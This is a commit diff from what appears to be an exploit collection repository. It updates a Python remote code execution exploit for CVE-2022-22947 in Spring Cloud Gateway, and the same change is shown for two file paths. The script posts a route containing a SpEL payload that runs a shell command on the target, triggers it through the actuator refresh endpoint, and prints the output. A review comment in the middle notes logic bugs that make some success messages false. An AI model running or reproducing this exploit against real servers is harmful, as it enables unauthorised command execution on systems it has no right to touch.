优化poc 执行过程
helloexp committed Mar 4, 2022
1 parent b7f525b commit 38f71a7
Showing 6 changed files with 122 additions and 40 deletions.
3 changes: 3 additions & 0 deletions 00-CVE_EXP/CVE-2022-22947/README.md
Expand Up @@ -81,3 +81,6 @@ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Connection: close
```
![image1](images/4.png)

## poc 输出结果
![poc 输出](images/poc.png)
78 changes: 58 additions & 20 deletions 00-CVE_EXP/CVE-2022-22947/exp/exp01.py
@@ -1,10 +1,12 @@
import time

import requests
import json
import sys
import os


def exec(url):

def exploit(target_url):
headers1 = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
Expand All @@ -18,37 +20,73 @@ def exec(url):
'Content-Type': 'application/x-www-form-urlencoded'
}

## command to execute replace "id" in payload
# command to execute replace "id" in payload

payload = '''{\r
"id": "hacktest",\r
"filters": [{\r
"name": "AddResponseHeader",\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
}],\r
"uri": "http://127.0.0.1",\r
"order": 0\r
}'''


if target_url.endswith('/'):
target_url = target_url.rstrip('/')

if not target_url.startswith('http'):
print("-->请在地址前补充 http://、或https://")
exit(0)

if 'actuator' in target_url:
target_url = target_url.split('actuator')[0].rstrip('/')
print(target_url)

re1 = requests.post(url=target_url + "/actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json)
time.sleep(0.1)
re2 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
time.sleep(0.1)
re3 = requests.get(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)


re1 = requests.post(url=url + "/actuator/gateway/routes/hacktest",data=payload,headers=headers1,json=json)
re2 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
re3 = requests.get(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re4 = requests.delete(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re5 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
print(re1.text)
print(re3.text)
print("+++++++++++++++执行过程记录++++++++++++++++++")
if re1.status_code == 201:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 成功 √")
else:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 失败 ×")
exit(0)

if re2.status_code == 200:
print("Step2: 触发 payload 成功 √")
else:
print("Step2: 触发 payload 失败 ×")
exit(0)

if re3.status_code == 200:
if 'AddResponseHeader' in re3.text:
print("Step3: 执行 payload 成功 √")
print("输出如下:")
print(re3.text)

re4 = requests.delete(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)
re5 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
if re4.status_code and re5.status_code == 200:
print("Step4: 清理路由成功 成功 √")
else:
print("Step3: payload 执行 失败 ×")
exit(0)


if __name__ == "__main__":
print(''' CVE-2022-22947 exploit
print(''' CVE-2022-22947 exploit
usage: python3 test.py url
usage: python3 test.py http://8.8.8.8:9000/
''')
if(len(sys.argv)>1):
url = sys.argv[1]
exec(url)
else:
exit()
if len(sys.argv) > 1:
url = sys.argv[1]
exploit(url)
print("\n 漏洞利用 成功 √ \n")
else:
exit()
print("\n 漏洞利用 失败 × \n")
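Review bot: The cleanup check `if re4.status_code and re5.status_code == 200:` is an operator-precedence bug — it only requires re4 to have any status code at all, so a failed DELETE still prints "Step4: 清理路由成功 成功 √" while the `hacktest` route stays registered on the target; it should read `if re4.status_code == 200 and re5.status_code == 200:`. Indentation is not recoverable on this page, but that step has three nested `if`s and a single `else:`, so at least two outcomes (a 200 reply without `AddResponseHeader` in the body, or a failed cleanup) have no branch of their own and fall through to the "漏洞利用 成功" message in `__main__`. The failure paths call `exit(0)`, which both skips `__main__`'s own failure message and reports success to the calling shell; `sys.exit(1)` would be the conventional fix, and the final `print("\n 漏洞利用 失败 × \n")` after `exit()` looks unreachable as shown. `json=json` in the first `requests.post` passes the `json` module object rather than a body (requests ignores it because `data=payload` is set) and `import os` is unused; both should be dropped. The same file is duplicated under `21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/exp/exp01.py` with the identical issues.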

Binary file added 00-CVE_EXP/CVE-2022-22947/images/poc.png
3 changes: 3 additions & 0 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
Expand Up @@ -81,3 +81,6 @@ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Connection: close
```
![image1](images/4.png)

## poc 输出结果
![poc 输出](images/poc.png)
78 changes: 58 additions & 20 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/exp/exp01.py
@@ -1,10 +1,12 @@
import time

import requests
import json
import sys
import os


def exec(url):

def exploit(target_url):
headers1 = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
Expand All @@ -18,37 +20,73 @@ def exec(url):
'Content-Type': 'application/x-www-form-urlencoded'
}

## command to execute replace "id" in payload
# command to execute replace "id" in payload

payload = '''{\r
"id": "hacktest",\r
"filters": [{\r
"name": "AddResponseHeader",\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
}],\r
"uri": "http://127.0.0.1",\r
"order": 0\r
}'''


if target_url.endswith('/'):
target_url = target_url.rstrip('/')

if not target_url.startswith('http'):
print("-->请在地址前补充 http://、或https://")
exit(0)

if 'actuator' in target_url:
target_url = target_url.split('actuator')[0].rstrip('/')
print(target_url)

re1 = requests.post(url=target_url + "/actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json)
time.sleep(0.1)
re2 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
time.sleep(0.1)
re3 = requests.get(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)


re1 = requests.post(url=url + "/actuator/gateway/routes/hacktest",data=payload,headers=headers1,json=json)
re2 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
re3 = requests.get(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re4 = requests.delete(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re5 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
print(re1.text)
print(re3.text)
print("+++++++++++++++执行过程记录++++++++++++++++++")
if re1.status_code == 201:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 成功 √")
else:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 失败 ×")
exit(0)

if re2.status_code == 200:
print("Step2: 触发 payload 成功 √")
else:
print("Step2: 触发 payload 失败 ×")
exit(0)

if re3.status_code == 200:
if 'AddResponseHeader' in re3.text:
print("Step3: 执行 payload 成功 √")
print("输出如下:")
print(re3.text)

re4 = requests.delete(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)
re5 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
if re4.status_code and re5.status_code == 200:
print("Step4: 清理路由成功 成功 √")
else:
print("Step3: payload 执行 失败 ×")
exit(0)


if __name__ == "__main__":
print(''' CVE-2022-22947 exploit
print(''' CVE-2022-22947 exploit
usage: python3 test.py url
usage: python3 test.py http://8.8.8.8:9000/
''')
if(len(sys.argv)>1):
url = sys.argv[1]
exec(url)
else:
exit()
if len(sys.argv) > 1:
url = sys.argv[1]
exploit(url)
print("\n 漏洞利用 成功 √ \n")
else:
exit()
print("\n 漏洞利用 失败 × \n")

